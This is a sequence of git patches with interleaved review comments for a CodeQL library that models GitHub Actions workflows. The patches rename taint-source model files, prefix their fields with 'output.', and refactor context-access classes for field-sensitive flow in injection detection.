ql/lib/ext/ahmadnassri_action-changed-files.model.yml diff --git a/ql/lib/ext/dorny_paths-filter.yml b/ql/lib/ext/dorny_paths-filter.model.yml similarity index 100% rename from ql/lib/ext/dorny_paths-filter.yml rename to ql/lib/ext/dorny_paths-filter.model.yml diff --git a/ql/lib/ext/jitterbit_get-changed-files.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml similarity index 100% rename from ql/lib/ext/jitterbit_get-changed-files.yml rename to ql/lib/ext/jitterbit_get-changed-files.model.yml diff --git a/ql/lib/ext/tj-actions_verify-changed-files.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml similarity index 100% rename from ql/lib/ext/tj-actions_verify-changed-files.yml rename to ql/lib/ext/tj-actions_verify-changed-files.model.yml From 29b3d6c9efe6993bf23dfb586c31e1a79939ac57 Mon Sep 17 00:00:00 2001 
From: jorgectf Date: Tue, 13 Feb 2024 15:00:53 +0100 Subject: [PATCH 028/707] Prefix sources with `output.` --- ...ahmadnassri_action-changed-files.model.yml | 8 +-- ql/lib/ext/dorny_paths-filter.model.yml | 4 +- .../ext/jitterbit_get-changed-files.model.yml | 28 ++++---- ql/lib/ext/tj-actions_changed-files.model.yml | 68 +++++++++---------- .../tj-actions_verify-changed-files.model.yml | 4 +- 5 files changed, 56 insertions(+), 56 deletions(-)
diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml
index bd86b3f843e1..3308967eebc1 100644
--- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml
+++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml
@@ -3,7 +3,7 @@ extensions:
pack: codeql/actions-all
extensible: sourceModel
data:
- - ["ahmadnassri/action-changed-files", "*", "files", "pull_request", "PR changed files"]
- - ["ahmadnassri/action-changed-files", "*", "files", "pull_request_target", "PR changed files"]
- - ["ahmadnassri/action-changed-files", "*", "json", "pull_request", "PR changed files"]
- - ["ahmadnassri/action-changed-files", "*", "json", "pull_request_target", "PR changed files"]
+ - ["ahmadnassri/action-changed-files", "*", "output.files", "pull_request", "PR changed files"]
+ - ["ahmadnassri/action-changed-files", "*", "output.files", "pull_request_target", "PR changed files"]
+ - ["ahmadnassri/action-changed-files", "*", "output.json", "pull_request", "PR changed files"]
+ - ["ahmadnassri/action-changed-files", "*", "output.json", "pull_request_target", "PR changed files"]
diff --git a/ql/lib/ext/dorny_paths-filter.model.yml b/ql/lib/ext/dorny_paths-filter.model.yml
index c9cdd2dbcc0f..d2b2ed48fc5f 100644
--- a/ql/lib/ext/dorny_paths-filter.model.yml
+++ b/ql/lib/ext/dorny_paths-filter.model.yml
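Review bot: Nothing in this commit documents that the third column now holds an access path (`output.files`) rather than a bare output name, and the diffstat shows only the five `ql/lib/ext` model files changing, so the predicate that consumes `sourceModel` is not updated here; if it still compares the bare name, every prefixed row is dead until that follow-up lands. The same prefix is applied in the dorny, jitterbit, tj-actions and verify-changed-files hunks of this commit. A one-line comment above `data:` such as `# column 3 is the access path of the tainted value: output.<name> is the action's output <name>` in each file would make the convention explicit, and a pointer to the consuming predicate would let a reviewer confirm both sides agree.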
@@ -3,5 +3,5 @@ extensions:
pack: codeql/actions-all
extensible: sourceModel
data:
- - ["dorny/paths-filter", "*", "changes", "pull_request", "PR changed files"]
- - ["dorny/paths-filter", "*", "changes", "pull_request_target", "PR changed files"]
+ - ["dorny/paths-filter", "*", "output.changes", "pull_request", "PR changed files"]
+ - ["dorny/paths-filter", "*", "output.changes", "pull_request_target", "PR changed files"]
diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml
index 198e60d42458..bc7344eedca6 100644
--- a/ql/lib/ext/jitterbit_get-changed-files.model.yml
+++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml
@@ -3,17 +3,17 @@ extensions:
pack: codeql/actions-all
extensible: sourceModel
data:
- - ["jitterbit/get-changed-files", "*", "all", "pull_request", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "all", "pull_request_target", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "added", "pull_request", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "added", "pull_request_target", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "modified", "pull_request", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "modified", "pull_request_target", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "removed", "pull_request", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "removed", "pull_request_target", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "renamed", "pull_request", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "renamed", "pull_request_target", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "added_modified", "pull_request", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "added_modified", "pull_request_target", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "deleted", "pull_request", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "deleted", "pull_request_target", "PR changed files"]
\ No newline at end of file
+ - ["jitterbit/get-changed-files", "*", "output.all", "pull_request", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.all", "pull_request_target", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.added", "pull_request", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.added", "pull_request_target", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.modified", "pull_request", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.modified", "pull_request_target", "PR changed files"]
+ -
["jitterbit/get-changed-files", "*", "output.removed", "pull_request", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.removed", "pull_request_target", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.renamed", "pull_request", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.renamed", "pull_request_target", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request_target", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request_target", "PR changed files"]
\ No newline at end of file
diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml
index 1ef816727e1f..b3b8baed7fc0 100644
--- a/ql/lib/ext/tj-actions_changed-files.model.yml
+++ b/ql/lib/ext/tj-actions_changed-files.model.yml
@@ -3,37 +3,37 @@ extensions:
pack: codeql/actions-all
extensible: sourceModel
data:
- - ["tj-actions/changed-files", "*", "added_files", "pull_request", "PR changed files"]
- - ["tj-actions/changed-files", "*", "added_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "copied_files", "pull_request", "PR changed files"]
- - ["tj-actions/changed-files", "*", "copied_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "deleted_files", "pull_request", "PR changed files"]
- - ["tj-actions/changed-files", "*", "deleted_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "modified_files", "pull_request", "PR changed files"]
- - ["tj-actions/changed-files", "*", "modified_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "renamed_files", "pull_request", "PR changed files"]
- - ["tj-actions/changed-files", "*", "renamed_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "all_old_new_renamed_files", "pull_request", "PR changed files"]
- - ["tj-actions/changed-files", "*", "all_old_new_renamed_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "type_changed_files", "pull_request", "PR changed files"]
- - ["tj-actions/changed-files", "*", "type_changed_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "unmerged_files", "pull_request", "PR changed files"]
- - ["tj-actions/changed-files", "*", "unmerged_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "unknown_files", "pull_request", "PR changed files"]
- - ["tj-actions/changed-files", "*", "unknown_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "all_changed_and_modified_files", "pull_request", "PR changed files"]
- - ["tj-actions/changed-files", "*", "all_changed_and_modified_files",
"pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "all_changed_files", "pull_request", "PR changed files"]
- - ["tj-actions/changed-files", "*", "all_changed_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "other_changed_files", "pull_request", "PR changed files"]
- - ["tj-actions/changed-files", "*", "other_changed_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "all_modified_files", "pull_request", "PR changed files"]
- - ["tj-actions/changed-files", "*", "all_modified_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "other_modified_files", "pull_request", "PR changed files"]
- - ["tj-actions/changed-files", "*", "other_modified_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "other_deleted_files", "pull_request", "PR changed files"]
- - ["tj-actions/changed-files", "*", "other_deleted_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "modified_keys", "pull_request", "PR changed files"]
- - ["tj-actions/changed-files", "*", "modified_keys", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "changed_keys", "pull_request", "PR changed files"]
- - ["tj-actions/changed-files", "*", "changed_keys", "pull_request_target", "PR changed files"]
\ No newline at end of file
+ - ["tj-actions/changed-files", "*", "output.added_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.added_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.copied_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.copied_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.deleted_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*",
"output.deleted_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.modified_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.modified_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.renamed_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.renamed_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.type_changed_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.type_changed_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.unmerged_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.unmerged_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.unknown_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.unknown_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.all_changed_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.all_changed_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.other_changed_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.other_changed_files", "pull_request_target", "PR changed files"]
+ -
["tj-actions/changed-files", "*", "output.all_modified_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.all_modified_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"] \ No newline at end of file diff --git a/ql/lib/ext/tj-actions_verify-changed-files.model.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml index 076ecff353c4..408abfbb8d0c 100644 --- a/ql/lib/ext/tj-actions_verify-changed-files.model.yml +++ b/ql/lib/ext/tj-actions_verify-changed-files.model.yml @@ -3,5 +3,5 @@ extensions: pack: codeql/actions-all extensible: sourceModel data: - - ["tj-actions/verify-changed-files", "*", "changed-files", "pull_request", "PR changed files"] - - ["tj-actions/verify-changed-files", "*", "changed-files", "pull_request_target", "PR changed files"] + - ["tj-actions/verify-changed-files", "*", "output.changed-files", "pull_request", "PR changed files"] + - ["tj-actions/verify-changed-files", "*", "output.changed-files", "pull_request_target", "PR changed files"] From e6b4676f9086d10bae70eb380bca48fa635eaf96 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 14 Feb 2024 10:47:00 +0100 Subject: [PATCH 029/707] feat(field-flow): enhance dataflow tracking implement field flow to reduce false positives --- ql/lib/codeql/actions/Ast.qll | 148 +++++++++++++----- .../codeql/actions/ast/internal/Actions.qll | 6 +- .../codeql/actions/dataflow/ExternalFlow.qll | 76 +++++++-- .../codeql/actions/dataflow/FlowSources.qll | 36 +---- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 59 ++----- .../dataflow/internal/DataFlowPrivate.qll | 116 +++++++++++--- .../dataflow/internal/DataFlowPublic.qll | 47 ++++-- ql/lib/ext/tj-actions-changed-files.model.yml | 46 +++--- .../Security/CWE-094/ExpressionInjection.ql | 4 +- ql/src/test/.github/workflows/ci-cleanup.yml | 47 ------ .../workflows/image_link_generator.yml | 24 +-- .../workflows/image_link_generator_2.yml | 61 -------- .../workflows/image_link_generator_3.yml | 27 ---- .../workflows/{inter1.yml => inter-job.yml} | 0 ql/src/test/.github/workflows/simple1.yml | 9 +- ql/src/test/.github/workflows/simple2.yml | 6 + ql/src/test/.github/workflows/test.yml | 7 +- 17 files changed, 379 insertions(+), 340 deletions(-) delete mode 100644 ql/src/test/.github/workflows/ci-cleanup.yml delete mode 100644 ql/src/test/.github/workflows/image_link_generator_2.yml delete mode 100644 ql/src/test/.github/workflows/image_link_generator_3.yml rename ql/src/test/.github/workflows/{inter1.yml => inter-job.yml} (100%) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 6307897685f8..087b7f19e626 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -95,6 +95,8 @@ class OutputsStmt extends Statement instanceof YamlMapping { this.(YamlMapping).lookup(name).(YamlMapping).lookup("value") = result or this.(YamlMapping).lookup(name) = result } + + string getAnOutputName() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = result), _) } } class InputExpr extends Expression instanceof YamlString { 
@@ -158,6 +160,10 @@ class JobStmt extends Statement instanceof Actions::Job { * arg1: value1 */ JobUsesExpr getUsesExpr() { result.getJobStmt() = this } + + predicate usesReusableWorkflow() { + this.(YamlMapping).maps(any(YamlString s | s.getValue() = "uses"), _) + } } /** 
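Review bot: The new `usesReusableWorkflow()` on JobStmt has no QLDoc, while the neighbouring `getUsesExpr()` visible in the hunk's context is documented. I would add `/** Holds if this job calls a reusable workflow, i.e. it has a job-level `uses:` key instead of `steps:`. */` above it, since the body only tests for the presence of a `uses` key and a reader could otherwise mistake it for a check on action steps (a job-level `uses` is, as far as I know, only valid for reusable-workflow calls, which is why the presence test is enough). The enclosing class JobStmt starts before the hunk.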
@@ -353,26 +359,51 @@ class ExprAccessExpr extends Expression instanceof YamlString { string getExpression() { result = expr } JobStmt getJobStmt() { result.getAChildNode*() = this } +} + +/** + * A context access expression. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + */ +class CtxAccessExpr extends ExprAccessExpr { + CtxAccessExpr() { + expr.regexpMatch([ + stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex() + ]) + } + + abstract string getFieldName(); abstract Expression getRefExpr(); } +private string stepsCtxRegex() { result = "steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)" } + +private string needsCtxRegex() { result = "needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)" } + +private string jobsCtxRegex() { result = "jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)" } + +private string envCtxRegex() { result = "env\\.([A-Za-z0-9_-]+)" } + +private string inputsCtxRegex() { result = "inputs\\.([A-Za-z0-9_-]+)" } + /** - * Holds for an ExprAccessExpr accesing the `steps` context. + * Holds for an expression accesing the `steps` context. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. 
`${{ steps.changed-files.outputs.all_changed_files }}` */ -class StepOutputAccessExpr extends ExprAccessExpr { +class StepsCtxAccessExpr extends CtxAccessExpr { string stepId; - string varName; + string fieldName; - StepOutputAccessExpr() { - stepId = - this.getExpression().regexpCapture("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.[A-Za-z0-9_-]+", 1) and - varName = - this.getExpression().regexpCapture("steps\\.[A-Za-z0-9_-]+\\.outputs\\.([A-Za-z0-9_-]+)", 1) + StepsCtxAccessExpr() { + expr.regexpMatch(stepsCtxRegex()) and + stepId = expr.regexpCapture(stepsCtxRegex(), 1) and + fieldName = expr.regexpCapture(stepsCtxRegex(), 2) } + override string getFieldName() { result = fieldName } + override Expression getRefExpr() { this.getLocation().getFile() = result.getLocation().getFile() and result.(StepStmt).getId() = stepId 
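Review bot: `CtxAccessExpr`'s characteristic predicate uses `regexpMatch` against lowercase literals such as `steps\.…\.outputs\.…`, and `regexpMatch` requires the whole string to match, so an access with different casing (`Steps.x.outputs.y`), bracket indexing (`steps['x'].outputs.y`) or embedded in a larger expression (`format('{0}', steps.x.outputs.y)`, `steps.x.outputs.y || ''`) is not a CtxAccessExpr at all and the taint read through it is silently dropped. GitHub documents property dereferences as case-insensitive, so these are real workflow shapes and for an injection query they are false negatives rather than noise. If `expr` is always a bare dereference by the time this class is constructed (the ExprAccessExpr constructor is outside the hunk, so I cannot confirm), consider at least a case-insensitive flag in the helpers, e.g. `private string stepsCtxRegex() { result = "(?i)steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)" }`; otherwise match the access as a substring with `regexpFind`/`regexpCapture` rather than requiring the whole expression to be the access. A short comment on `CtxAccessExpr` stating which forms are deliberately out of scope would help either way.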
@@ -380,79 +411,112 @@ class StepOutputAccessExpr extends ExprAccessExpr { } /** - * Holds for an ExprAccessExpr accesing the `needs` or `job` contexts. + * Holds for an expression accesing the `needs` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ needs.job1.outputs.foo}}` + */ +class NeedsCtxAccessExpr extends CtxAccessExpr { + JobStmt job; + string jobId; + string fieldName; + + NeedsCtxAccessExpr() { + expr.regexpMatch(needsCtxRegex()) and + jobId = expr.regexpCapture(needsCtxRegex(), 1) and + fieldName = expr.regexpCapture(needsCtxRegex(), 2) and + job.getId() = jobId + } + + predicate usesReusableWorkflow() { job.usesReusableWorkflow() } + + override string getFieldName() { result = fieldName } + + override Expression getRefExpr() { + job.getLocation().getFile() = this.getLocation().getFile() and + ( + // regular jobs + job.getOutputStmt().getOutputExpr(fieldName) = result + or + // jobs calling reusable workflows + job.getUsesExpr() = result + ) + } +} + +/** + * Holds for an expression accesing the `jobs` context. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability - * e.g. `${{ needs.job1.outputs.foo}}` or `${{ jobs.job1.outputs.foo}}` (for reusable workflows) + * e.g. 
`${{ jobs.job1.outputs.foo}}` (within reusable workflows) */ -class JobOutputAccessExpr extends ExprAccessExpr { +class JobsCtxAccessExpr extends CtxAccessExpr { string jobId; - string varName; - - JobOutputAccessExpr() { - jobId = - this.getExpression() - .regexpCapture("(needs|jobs)\\.([A-Za-z0-9_-]+)\\.outputs\\.[A-Za-z0-9_-]+", 2) and - varName = - this.getExpression() - .regexpCapture("(needs|jobs)\\.[A-Za-z0-9_-]+\\.outputs\\.([A-Za-z0-9_-]+)", 2) + string fieldName; + + JobsCtxAccessExpr() { + expr.regexpMatch(jobsCtxRegex()) and + jobId = expr.regexpCapture(jobsCtxRegex(), 1) and + fieldName = expr.regexpCapture(jobsCtxRegex(), 2) } + override string getFieldName() { result = fieldName } + override Expression getRefExpr() { exists(JobStmt job | job.getId() = jobId and job.getLocation().getFile() = this.getLocation().getFile() and - ( - // A Job can have multiple outputs, so we need to check both - // jobs..outputs. - job.getOutputStmt().getOutputExpr(varName) = result - or - // jobs..uses (variables returned from the reusable workflow - job.getUsesExpr() = result - ) + job.getOutputStmt().getOutputExpr(fieldName) = result ) } } /** - * Holds for an ExprAccessExpr accesing the `inputs` context. + * Holds for an expression the `inputs` context. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. 
`${{ inputs.foo }}` */ -class InputAccessExpr extends ExprAccessExpr { - string paramName; +class InputsCtxAccessExpr extends CtxAccessExpr { + string fieldName; - InputAccessExpr() { - paramName = this.getExpression().regexpCapture("inputs\\.([A-Za-z0-9_-]+)", 1) + InputsCtxAccessExpr() { + expr.regexpMatch(inputsCtxRegex()) and + fieldName = expr.regexpCapture(inputsCtxRegex(), 1) } + override string getFieldName() { result = fieldName } + override Expression getRefExpr() { exists(ReusableWorkflowStmt w | w.getLocation().getFile() = this.getLocation().getFile() and - w.getInputsStmt().getInputExpr(paramName) = result + w.getInputsStmt().getInputExpr(fieldName) = result ) or exists(CompositeActionStmt a | a.getLocation().getFile() = this.getLocation().getFile() and - a.getInputsStmt().getInputExpr(paramName) = result + a.getInputsStmt().getInputExpr(fieldName) = result ) } } /** - * Holds for an ExprAccessExpr accesing the `env` context. + * Holds for an expression accesing the `env` context. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ env.foo }}` */ -class EnvAccessExpr extends ExprAccessExpr { - string varName; +class EnvCtxAccessExpr extends CtxAccessExpr { + string fieldName; + + EnvCtxAccessExpr() { + expr.regexpMatch(envCtxRegex()) and + fieldName = expr.regexpCapture(envCtxRegex(), 1) + } - EnvAccessExpr() { varName = this.getExpression().regexpCapture("env\\.([A-Za-z0-9_-]+)", 1) } + override string getFieldName() { result = fieldName } override Expression getRefExpr() { - exists(JobUsesExpr s | s.getEnvExpr(varName) = result) + exists(JobUsesExpr s | s.getEnvExpr(fieldName) = result) or - exists(StepUsesExpr s | s.getEnvExpr(varName) = result) + exists(StepUsesExpr s | s.getEnvExpr(fieldName) = result) or - exists(RunExpr s | s.getEnvExpr(varName) = result) + exists(RunExpr s | s.getEnvExpr(fieldName) = result) } } 
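Review bot: In `NeedsCtxAccessExpr` the field `job` is bound in the characteristic predicate only by `job.getId() = jobId`, while the same-file check `job.getLocation().getFile() = this.getLocation().getFile()` lives in `getRefExpr()`. Any other workflow in the database with a job of the same id (`build`, `test`, …) therefore also binds `job`, so `usesReusableWorkflow()` holds for this access whenever any of those unrelated jobs calls a reusable workflow, and that predicate is what `reusableWorkflowReturnReadStep` keys on. Move the constraint into the constructor, `job.getId() = jobId and job.getLocation().getFile() = this.getLocation().getFile()`, after which `getRefExpr()` can drop its own file check. `EnvCtxAccessExpr.getRefExpr()` is similarly unscoped (any `JobUsesExpr`/`StepUsesExpr`/`RunExpr` in any file declaring that `env` name), though that part is pre-existing context rather than new code.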
diff --git a/ql/lib/codeql/actions/ast/internal/Actions.qll b/ql/lib/codeql/actions/ast/internal/Actions.qll index a11759b0c932..2fb17eef88bf 100644 --- a/ql/lib/codeql/actions/ast/internal/Actions.qll +++ b/ql/lib/codeql/actions/ast/internal/Actions.qll @@ -294,8 +294,10 @@ module Actions { /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ string getGitHubRepository() { result = - this.getValue().regexpCapture(usesParser(), 1) + "/" + - this.getValue().regexpCapture(usesParser(), 2) + ( + this.getValue().regexpCapture(usesParser(), 1) + "/" + + this.getValue().regexpCapture(usesParser(), 2) + ).toLowerCase() } /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index b19fbcbaca6d..c2da24ba52c6 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll 
@@ -2,21 +2,31 @@ private import internal.ExternalFlowExtensions as Extensions import codeql.actions.DataFlow import actions -/** Holds if a source model exists for the given parameters. */ +/** + * MaD sources + * Fields: + * - action: Fully-qualified action name (NWO) + * - version: Either '*' or a specific SHA/Tag + * - output arg: To node (prefixed with either `env.` or `output.`) + * - trigger: Triggering event under which this model introduces tainted data. Use `*` for any event. + */ predicate sourceModel(string action, string version, string output, string trigger, string kind) { Extensions::sourceModel(action, version, output, trigger, kind) } -/** Holds if a sink model exists for the given parameters. */ +/** + * MaD summaries + * Fields: + * - action: Fully-qualified action name (NWO) + * - version: Either '*' or a specific SHA/Tag + * - input arg: From node (prefixed with either `env.` or `input.`) + * - output arg: To node (prefixed with either `env.` or `output.`) + * - kind: Either 'Taint' or 'Value' + */ predicate summaryModel(string action, string version, string input, string output, string kind) { Extensions::summaryModel(action, version, input, output, kind) } -/** Holds if a sink model exists for the given parameters. */ -predicate sinkModel(string action, string version, string input, string kind) { - Extensions::sinkModel(action, version, input, kind) -} - /** * MaD sinks * Fields: 
@@ -25,7 +35,55 @@ predicate sinkModel(string action, string version, string input, string kind) { * - input arg: sink node (prefixed with either `env.` or `input.`) * - kind: sink kind */ -predicate sinkNode(DataFlow::ExprNode sink, string kind) { +predicate sinkModel(string action, string version, string input, string kind) { + Extensions::sinkModel(action, version, input, kind) +} + +predicate externallyDefinedSource(DataFlow::Node source, string sourceType, string fieldName) { + exists(UsesExpr uses, string action, string version, string trigger, string kind | + sourceModel(action, version, fieldName, trigger, kind) and + uses.getCallee() = action.toLowerCase() and + ( + if version.trim() = "*" + then uses.getVersion() = any(string v) + else uses.getVersion() = version.trim() + ) and + ( + if fieldName.trim().matches("env.%") + then source.asExpr() = uses.getEnvExpr(fieldName.trim().replaceAll("env\\.", "")) + else + if fieldName.trim().matches("output.%") + then + // 'output.' is the default qualifier + source.asExpr() = uses + else none() + ) and + sourceType = kind + ) +} + +predicate externallyDefinedSummary(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists(UsesExpr uses, string action, string version, string input, string output | + c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and + summaryModel(action, version, input, output, "taint") and + uses.getCallee() = action.toLowerCase() and + ( + if version.trim() = "*" + then uses.getVersion() = any(string v) + else uses.getVersion() = version.trim() + ) and + ( + if input.trim().matches("env.%") + then pred.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env\\.", "")) + else + // 'input.' 
is the default qualifier + pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input\\.", "")) + ) and + succ.asExpr() = uses + ) +} + +predicate externallyDefinedSink(DataFlow::ExprNode sink, string kind) { exists(UsesExpr uses, string action, string version, string input | ( if input.trim().matches("env.%") @@ -33,7 +91,7 @@ predicate sinkNode(DataFlow::ExprNode sink, string kind) { else sink.asExpr() = uses.getArgumentExpr(input.trim()) ) and sinkModel(action, version, input, kind) and - uses.getCallee() = action and + uses.getCallee() = action.toLowerCase() and ( if version.trim() = "*" then uses.getVersion() = any(string v) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index fae6c74b0b3c..2b35b2f332f0 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
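Review bot: `externallyDefinedSummary` derives the content name with `output.replaceAll("output\\.", "")` and `externallyDefinedSource` strips its prefix with `fieldName.trim().replaceAll("env\\.", "")`, but as far as I can tell QL's `replaceAll` is a literal substring replacement, not a regex: the pattern is the five characters `output\.`, which never occur in `output.foo`, so the `FieldContent` stored here is named `output.foo` and can never match the bare `foo` read via `StepsCtxAccessExpr.getFieldName()`. Use `regexpReplaceAll("^output\\.", "")` / `regexpReplaceAll("^env\\.", "")` (or `suffix(7)` / `suffix(4)` after the `matches` check already performed). Two smaller points in the same hunk: `trigger` is bound from `sourceModel` but never compared with the workflow's `on:` events, so the per-event rows in the model files (`pull_request` vs `pull_request_target`) have no effect yet and a `// TODO: filter by trigger` would keep that honest; and `summaryModel(..., "taint")` is matched case-sensitively while the doc comment added to this file says the kind is `'Taint'` or `'Value'`, so one of the two should change.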
